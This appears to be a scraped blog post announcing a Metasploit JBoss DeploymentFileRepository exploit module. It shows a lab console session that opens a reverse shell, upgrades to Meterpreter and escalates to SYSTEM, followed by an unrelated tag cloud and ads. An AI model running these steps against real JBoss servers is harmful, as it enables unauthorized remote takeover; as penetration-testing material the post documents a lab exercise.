Metasploit jboss deployment file repository exploit

Label: , , ,

MC pushed out a new exploit today (jboss_deploymentfilerrepository)


so while it lists 4.x as vuln, actually several other versions are vulnerable as well including 6.0.0M1 and 5.1.0 :-)
msf exploit(jboss_deploymentfilerepository) > exploit

[*] Started reverse handler on 192.168.1.101:4444
[*] Triggering payload at '/web-console/HYQ.jsp'...
[*] Command shell session 3 opened (192.168.1.101:4444 -> 192.168.1.101:57796) at Sun May 09 11:20:31 -0400 2010

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin>whoami
whoami
win2k3lab\administrator

C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin>^Z
Background session 3? [y/N]  y
msf exploit(jboss_deploymentfilerepository) > sessions -l

Active sessions
===============

Id  Type   Information  Connection
--  ----   -----------  ----------
3   shell               192.168.1.101:4444 -> 192.168.1.101:57796

msf exploit(jboss_deploymentfilerepository) > sessions -u 3

msf exploit(jboss_deploymentfilerepository) >
msf exploit(jboss_deploymentfilerepository) > [*] Meterpreter session 4 opened (192.168.1.101:4444 -> 192.168.1.101:36591) at Sun May 09 11:21:32 -0400 2010

msf exploit(jboss_deploymentfilerepository) > sessions -l

Active sessions
===============

Id  Type         Information                                      Connection
--  ----         -----------                                      ----------
3   shell                                                         192.168.1.101:4444 -> 192.168.1.101:57796
4   meterpreter  win2k3lab\Administrator @ win2k3lab  192.168.1.101:4444 -> 192.168.1.101:36591

msf exploit(jboss_deploymentfilerepository) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: win2k3lab\Administrator
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin
meterpreter >

0 komentar:

Posting Komentar

Langganan: Posting Komentar (RSS)
Sale! $7.49.com domains at GoDaddy.com - 468x60
o o

Label

portable Internet teaching and learning Top Great Wallpaper Portable software repair word file book reviews download free Portable software Computer others Web software portable word fix word recovery worldwide Antivirus Business Creative teaching Pentesting Windows Big Picture Indonesia Metasploit MS Word Personalized Learning Threats computer forensics Action Plans and Lessons Blog Business Success Radio Blog Talk Radio Blogger Hack change free portable Blogging Leadership free inquiry learning project based learning shortcuts tricks AntiSpam Asia Identity Safe Internet Security Rants and Raves Widgets anti-virus protection doc repair Converter Creative Schools Integrated Learning Menu Ministry NZCurric Network Online Business PDF Report android formulas game global log analysis software virtual assistant work at home Comments Compression Creative teaching Educationalists Google Image Microsoft Mp3 Player Tips Viewer charts exploits formatting gynaecology interviews national standards obstetrics paediatrics perl phishing stellar word repair AV-Test Audio Blog Service Blogger Chrome Creativity DVD Domain Facebook Features Firefox History Language Microsoft Office portable Multimedia NOD32 portable ORTHOPEDICS Online Glossary PHYSIOLOGY Portable Antivirus Portable NOD32 Reader Scan Service State Template Traceroute VPN Video Videos Viruses Vulnerability Web Design antivirus portable customizing eBay free mp3 lookup mp3 download office outlook web access owa printing proxy site rapidshare what are you missing what did they take word recovery tool word repair file 10X 2010 20800mah 2Step 3 A$AP Rocky ANATOMY Access Advanced Uninstaller Akiko Alexa America American Express Animation Anonymous Anyone Apple Safari 3.1.1 Portable Arrington BCBS of TN Backspin Backups Banshee Best Passwords Billiards Blackberry Blog Jet Blog Jet portable CD/DVD Burn Charger Chat Collection Competition Computer viruses Corel Draw X4 Portable Creepy DDoS Desktop Development Dictionary Download free Portable Downloads Drives E N T Educationalists Enable Entertainment Excel FOLLOW ME FORENSIC MEDICINE Fire TV Stick Flashget 1.8 Freeware Full Scope Testing GENERAL MEDICINE Geolocation Giveaway Graphic HEMATOLOGY HTML HTML5 Hacked I C U INTERNAL MEDICINE IPv6 Insight Intelligent Charging. 6.6A/33W. Aluminum 3 USB Car Power Adapter Internet chat messenger Linux LoveWallpapers2010 MICROBIOLOGY Maya Complete Maya Unlimited 2008 Metasploit Pro Michael Microsoft portable Microsoft word portable Mini PC Money Monitoring Most Most Power Car Charger Motivation Mozilla Mozilla Firefox v3.0 Portable Mozilla Firefox Portable Edition v3.0 NEURO MEDICINE NOD32 Norton Account ONCOLOGY Offers Office portable 2010 Online Video Other PATHOLOGY PBS Newhour PDF 2 office PDF to Office PDF2Office portable Paperback Podcasts Portable Adobe Illustrator CS5 Portable All Office Converter Pro 4.0 Portable Blog Jet v.2.0.0.7 Portable Charger Portable USB Portable USB Disk Security Portable USB Disk Security 5.0.0.80 Portable free software Power Bank PowerDVD 8 Deluxe Portable PowerDVD Portable Printer Problems Product Key Product Tutorials Programing Proxy server Quarantine Quick RADIOLOGY RECOSOFT portable Recover Recover Keys Recovery Remove Right Ripper SANS SEO SMRecorder SURGERY SVDownloader Safe Web Scam Scapy School Vision Scurity Search Selena Gomez Smarphone Smart Powe Social network Solid Solutions Space Spam TRAUMA TV Stick Talent Development ThreatCon Toolbar Total Image Converter v2.0.1.0 Traceroute Visulization Track Twitter UROLOGY Uninstall Uninstaller PRO 9.1 VIROLOGY VNC Verification Wanted Webcams Webcast Webmaster Word 2007 portable XP Repair accessdata adobe portable CS5 adware aix app arrays assassin creeds IV author interviews auxiliary modules available biochemistry blackberry enterprise server business toll free number cd burning coldfusion command corel portable corel x4 portable dashboards data crashes data validation dental download game download software drawing drive crashes efile tax extension email recovery encryption europe external drives faster federal tax return extension filing federal tax extension flashget form 4868 free download portable software free download software portable free portabale software free portable mozilla free software free software portable mozilla ftk 2 functions games graphs green ilustrator CS5 portable information theft innovation iphone jboss lft lnk files log2timeline long distance calls long-distance number love notes maya 2008 maya portable mobile broadband mobile devices more mozilla portable navigation netanalysis news nmap opinion options paid to upload password cracking pc viruses portabel games portabel maya portable ESET portable PDF to Office portable blogjet portable game Backspin Billiards portable rapidshare portable safari portable software Portable Autorun Virus Remover 2.3 portable sofware powerpoint prefetch product proxy list ps3 quick r Tri Port Car Charger record regripper repair doc file research rpcclient safari portable scammers scanning scrap files security software XP Repair Pro 2007 sofware portable free spyware system crashes telecommuter temporary files testing the weeknd times toll-free number travel consultant unicornscan update user assist v3.0.657 virtual assistant directories virtual assistant freelance virtual assistant tool virtual assistants virtual jobs virus definition list web application testing webmail website word portable word repair work from home jobs writers z|| Link Exchange
Toko Kaos Satuan

Product




SUCKSHARE.COM My Zimbio o o